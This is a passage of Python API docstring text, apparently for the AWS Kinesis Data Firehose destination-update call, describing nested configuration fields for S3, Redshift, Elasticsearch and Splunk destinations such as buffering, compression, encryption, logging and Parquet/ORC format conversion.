:param S3DestinationUpdate: [Deprecated] Describes an update for a destination in Amazon S3.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. 
If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ExtendedS3DestinationUpdate: dict
:param ExtendedS3DestinationUpdate: Describes an update for a destination in Amazon S3.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --Enables or disables Amazon S3 backup mode.\n\nS3BackupUpdate (dict) --The Amazon S3 destination for backup.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. 
You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nDataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.\n\nSchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.\n\nRoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.\n\nCatalogId (string) --The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.\n\nDatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.\n\nTableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.\n\nRegion (string) --If you don\'t specify an AWS Region, the default is the current Region.\n\nVersionId (string) --Specifies the table version for the output data schema. 
If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.\n\n\n\nInputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.\n\nDeserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.\n\nOpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.\n\nConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is 'a.b', you can define the column name to be 'a_b' when using this option.\nThe default is false .\n\nCaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.\n\nColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {'ts': 'timestamp'} to map this key to a column named ts .\n\n(string) --\n(string) --\n\n\n\n\n\n\nHiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. 
Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.\n\nTimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.\n\n(string) --\n\n\n\n\n\n\n\n\nOutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.\n\nSerializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.\n\nParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nPageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.\n\nCompression (string) --The compression code to use over data blocks. 
The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.\n\nEnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.\n\nMaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.\n\nWriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .\n\n\n\nOrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .\n\nStripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nRowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.\n\nEnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .\n\nPaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.\nFor the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. 
In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.\nKinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .\n\nCompression (string) --The compression code to use over data blocks. The default is SNAPPY .\n\nBloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .\n\n(string) --\n\n\nBloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.\n\nDictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.\n\nFormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .\n\n\n\n\n\n\n\nEnabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.\n\n\n\n\n
:type RedshiftDestinationUpdate: dict
:param RedshiftDestinationUpdate: Describes an update for a destination in Amazon Redshift.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nClusterJDBCURL (string) --The database connection string.\n\nCopyCommand (dict) --The COPY command.\n\nDataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.\n\nDataTableColumns (string) --A comma-separated list of column names.\n\nCopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the 'Optional Parameters' section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:\n\ndelimiter \'\\t\' lzop; - fields are delimited with '\t' (TAB character) and compressed using lzop.\ndelimiter \'|\' - fields are delimited with '|' (this is the default delimiter).\ndelimiter \'|\' escape - the delimiter should be escaped.\nfixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.\nJSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.\n\nFor more examples, see Amazon Redshift COPY command examples .\n\n\n\nUsername (string) --The name of the user.\n\nPassword (string) --The user password.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).\n\nDurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). 
Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.\n\n\n\nS3Update (dict) --The Amazon S3 destination.\nThe compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationUpdate.S3Update because the Amazon Redshift COPY operation that reads from the S3 bucket doesn\'t support these compression formats.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. 
The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. 
This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupUpdate (dict) --The Amazon S3 destination for backup.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. 
This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. 
This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ElasticsearchDestinationUpdate: dict
:param ElasticsearchDestinationUpdate: Describes an update for a destination in Amazon ES.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nDomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the IAM role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\nSpecify either ClusterEndpoint or DomainARN .\n\nClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.\n\nIndexName (string) --The Elasticsearch index name.\n\nTypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during runtime.\nIf you upgrade Elasticsearch from 6.x to 7.x and don\'t update your delivery stream, Kinesis Data Firehose still delivers data to Elasticsearch with the old index name and type name. If you want to update your delivery stream with a new index name, provide an empty string for TypeName .\n\nIndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . Default value is OneDay .\n\nBufferingHints (dict) --The buffering options. 
If no value is specified, ElasticsearchBufferingHints object default values are used.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.\n\n\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).\n\nDurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.\n\n\n\nS3Update (dict) --The Amazon S3 destination.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. 
For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. 
For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type SplunkDestinationUpdate: dict
:param SplunkDestinationUpdate: Describes an update for a destination in Splunk.\n\nHECEndpoint (string) --The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.\n\nHECEndpointType (string) --This type can be either 'Raw' or 'Event.'\n\nHECToken (string) --A GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.\n\nHECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk or if it doesn\'t receive an acknowledgment of receipt from Splunk.\n\nDurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .\n\nS3Update (dict) --Your update to the configuration of the backup Amazon S3 location.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. 
For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
